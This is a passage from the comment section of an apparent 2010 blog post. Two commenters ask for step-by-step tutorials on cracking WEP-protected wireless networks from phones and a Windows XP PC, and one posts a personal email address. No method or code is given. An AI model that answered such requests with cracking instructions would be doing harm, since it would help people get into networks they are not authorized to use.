    thx

  135. youness chreim said,

    July 25, 2010 @ 15:23

    Hi every one . Can you help me plz to hack a wireless protected internet connection “WEP” mode using my nokia 5800 xm . Can you send me the link and the step by step tutorial cause i’am new in this field. And how to do this using my pc with windows xp sp2 . And thanks a lot .
    My email: ych_84@hotmail.com

  136. wifey said,

    August 10, 2010 @ 7:39

    How do I do it using my wi fi on my blackberry curve cell phone? Email me please n let me know. Thanks

RSS feed for comments on this post · TrackBack URI

Leave a Comment